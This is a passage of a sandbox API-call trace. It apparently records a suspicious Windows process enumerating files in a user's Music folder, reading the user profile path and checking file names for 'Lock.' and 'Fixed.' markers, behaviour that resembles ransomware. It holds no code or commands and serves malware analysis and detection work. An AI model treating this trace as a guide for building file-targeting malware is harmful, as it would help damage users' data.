(lpFileName="C:\\Users\\FD1HVy\\Music\\YXHKkgRMJbmq7xZC.mp3" (normalized: "c:\\users\\fd1hvy\\music\\yxhkkgrmjbmq7xzc.mp3")) returned 1 [0208.448] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda42a390, ftCreationTime.dwHighDateTime=0x1d5d4e4, ftLastAccessTime.dwLowDateTime=0x1137f5f0, ftLastAccessTime.dwHighDateTime=0x1d5ce85, ftLastWriteTime.dwLowDateTime=0x1137f5f0, ftLastWriteTime.dwHighDateTime=0x1d5ce85, nFileSizeHigh=0x0, nFileSizeLow=0xcc62, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="YXHKkgRMJbmq7xZC.mp3", cAlternateFileName="YXHKKG~1.MP3")) returned 0 [0208.448] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0208.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74b88 | out: hHeap=0x2af0000) returned 1 [0208.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.448] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0208.448] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0208.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0208.449] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a75000 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0208.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0208.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5f6c0 [0208.450] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\YXHKkgRMJbmq7xZC.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\YXHKkgRMJbmq7xZC.mp3", lpFilePart=0x8cf650*="YXHKkgRMJbmq7xZC.mp3") returned 0x2a [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0208.450] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\YXHKkgRMJbmq7xZC.mp3" (normalized: "c:\\users\\fd1hvy\\music\\yxhkkgrmjbmq7xzc.mp3")) returned 0xffffffff [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75000 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.451] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0208.451] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.451] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0208.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0208.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0208.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0208.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0208.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0208.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0208.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0208.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_qp6.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qp6.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p6.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0208.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0208.452] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0208.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12) returned 0x29f7160 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0208.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_qp6.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qp6.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p6.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0208.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73610 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0208.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.453] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0208.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.453] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0208.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0208.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0208.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0208.454] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0208.454] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0208.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0208.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0208.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0208.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0208.455] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0208.456] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0208.456] 